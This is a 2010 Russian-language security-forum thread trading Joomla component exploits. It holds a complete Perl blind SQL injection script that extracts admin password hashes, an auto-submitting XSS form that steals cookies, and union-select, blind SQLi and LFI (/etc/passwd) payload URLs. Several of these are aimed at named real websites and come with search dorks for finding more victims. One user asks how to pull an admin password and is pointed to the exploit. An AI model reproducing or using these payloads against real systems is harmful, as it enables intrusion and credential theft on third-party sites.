ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
17.04.2010, 18:20
|
|
Познающий
Регистрация: 20.04.2007
Сообщений: 49
Провел на форуме:
234777
Репутация:
44
|
|
товарищи, кто подскажет как узнать полную версию Joomla? вариант с configuration.php-dist не прокатит.
Версию можно посмотреть в файле /includes/version.php
|
|
|
23.04.2010, 11:43
|
|
Новичок
Регистрация: 10.04.2008
Сообщений: 2
Провел на форуме:
799982
Репутация:
0
|
|
Blind SQL Injection joomla component com_mytube (user_id)
PHP код:
#!/usr/bin/perl -w
#---------------------------------------------------------------------------------
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------
#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 15 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote
#---------------------------------------------------------------------------
#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description :
#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.
#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.
#---------------------------------------------------------------------------
#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id
#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++
use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;
system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t| | Chip d3 Bi0s | |\n";
print "\t\t| MyRemote Video Gallery Bsql | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";
print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>);
$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
print "----------------Inyectando----------------\n";
$host = $target . "+and+1=1&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {
$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}
else
{print " [-] Vulnerable :)\n";
$d=0;
for ($idusuario=62;$idusuario<=80;$idusuario++)
{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}
}
print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";
print " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>);
for ($x=1;$x<=32;$x++)
{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}
if ($content =~ /$regexp/)
{
for ($c=97;$c<=102;$c++)
{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}
}
else
{
for ($c=48;$c<=57;$c++)
{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}
}
}
print " [+] Password :"." ".join('', @caracter) . "\n";
my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";
}
}
else
{print " [-] Exploit Fallo :(\n";}
milw0rm.com [2009-09-21] |
|
|
|
27.05.2010, 13:33
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085
Репутация:
31
|
|
XSS vulnerability in JComments
Уязвимые верси: 2.1.0.0 [07/08/2009] и, возможно, ранние
Уведомление JoomlaTune.com: 4 Мая 2010
Тип уязвимости: XSS
Статус: исправлено JoomlaTune.com
Степень опасности: Средний
Детали уязвимости: пользователь может выполнить произвольный JS код в уязвимом приложении. Уязвимость возникает из-за неправильной идентификации пользователя в "admin.jcomments.php". Успешное проведение атаки с помощью данной уязвимости может привести к потере конфиденциальных данных и краже идентификационной информации в виде куков.
Атакующий может использовать браузер для проведения атаки:
Код:
<form method="POST" action="http://joomla/administrator/index.php" name="main">
<input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'>
<input type="hidden" name="email" value="example@example.com">
<input type="hidden" name="comment" value="comment text">
<input type="hidden" name="published" value="1">
<input type="hidden" name="option" value="com_jcomments">
<input type="hidden" name="id" value="1">
<input type="hidden" name="task" value="save">
</form>
<script>
document.main.submit();
</script>
Решение: обновление к более поздней версии
(c)http://securityvulns.ru/Xdocument887.html
Последний раз редактировалось lzr; 27.05.2010 в 13:47..
|
|
|
|
14.06.2010, 20:12
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
com_elite_experts
исходников не нашел
Expl:
Код:
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+
Example:
Код:
http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+
Dopk:
Код:
inurl:"option=com_elite_experts"
//Вроде не боян...
|
|
|
|
15.06.2010, 11:10
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
joomla image_com Blind Sql Injection
Dork
Code
Код:
site/patch/index.php?option=com_image&view=[sqli]
site/patch/index.php?option=com_image&Itemid=87&gallery=[sqli]
site/patch/index.php?option=com_image&view=image&Itemid=[sqli]
site/patch/index.php?option=com_image&page=[sqli]
© Inj3ct0r.com [2010-06-14]
|
|
|
|
20.06.2010, 12:31
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Joomla Component com_content blind SQL-Injection vulnerability
Version: --
Exploit:
Код:
Code:
index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=5+--+&Itemid=3&&lang=ru -> true
index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=4+--+&Itemid=3&&lang=ru -> false
Example:
Код:
Code:
http://www.newdiagnostics.dn.ua/index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=5+--+&Itemid=3&&lang=ru -> true
http://www.newdiagnostics.dn.ua/index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=4+--+&Itemid=3&&lang=ru -> false
|
|
|
|
20.06.2010, 13:41
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
.:[melkiy]:.
Так не пойдёт
com_content это стандартный компонент, тоесть если-бы там была SQL считай что ты похекал интырнеты.
Так что просто
Сообщение от None
Version: --
и без кода ненадо.
Или разбирайся почему на сайте работает, или давай код и версию.
Там старенькая на сайте версия, но учитывая популярность я на 99% уверен, что не могли такой баг пропустить в двиге, тем более в параметре ID
|
|
|
|
27.06.2010, 13:16
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
1.5.0 Release Candidate 3 [LFI]
версию можно посмотреть двумя способами:
1)в файле configuration.php-dist:
@version $Id: configuration.php-dist 14401 2010-01-26 14:10:00Z louis $
2)в хтмл исходниках админки:
http://www.site.com/administrator/
теперь об уязвимости:
уязвимая функция require_once в компоненте com_jesubmit&view=,возможно провести LFI,
конструкция:
Код:
Code:
http://www.site.com/index.php?option=com_jesubmit&view=[LFI%00]
пример:
Код:
Code:
http://www.hillsborofreepress.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
|
|
|
|
07.08.2010, 00:34
|
|
Познающий
Регистрация: 05.01.2009
Сообщений: 32
Провел на форуме:
146971
Репутация:
12
|
|
Joomla Component com_phocagallery SQL injection Vulnerability
Сообщение от None
================================================== ===========
Joomla Component com_phocagallery SQL injection Vulnerability
================================================== ===========
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+]Title Joomla Phoca Gallery Component com_phocagallery SQL-i Vulnerability
[+]Author **RoAd_KiLlEr**
[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on Win Xp Sp 2/3
[+]Version 2.7.3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Download App:http://joomlacode.org/gf/download/frsrelease/12532/52585/com_phocagallery_v2.7.3.zip
[~] Vendor: http://www.phoca.cz
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+]Description:
Phoca Gallery is a Joomla! gallery - image gallery for Joomla! CMS. It includes component, modules and plugins and allows users to display images or Youtube videos in many different styles.
=========================================
[+] Dork: inurl:"com_phocagallery"
==========================================
[+]. SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+
[Exploit]: http://127.0.0.1/path/index.php?option=com_phocagallery&view=categories& Itemid=[SQL Injection]
================================================== =========================================
[!] Albanian Hacking Crew
================================================== =========================================
[!] **RoAd_KiLlEr**
================================================== =========================================
[!] MaiL: sukihack[at]gmail[dot]com
================================================== =========================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
================================================== =========================================
[!] Spec Th4nks: Inj3ct0r.com & r0073r | indoushka from Dz-Ghost Team | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz
================================================== =========================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
================================================== =========================================
Народ кто подскажет как раскрутить эту SQL - нужно выудить пасс админа. Спасибо! |
|
|
|
07.08.2010, 02:23
|
|
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191
Репутация:
2562
|
|
Сообщение от Platon
Platon said:
Joomla Component com_phocagallery SQL injection Vulnerability
Народ кто подскажет как раскрутить эту SQL - нужно выудить пасс админа. Спасибо!
Юзай сплойт
Сообщение от None
[Exploit]: http://127.0.0.1/path/index.php?option=com_phocagallery&view=categories& Itemid=[SQL Injection]
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [@p05]](/avatars/avatar35697.jpg?2080210){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2204721){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2214660){kind=avatar}
Линейный вид
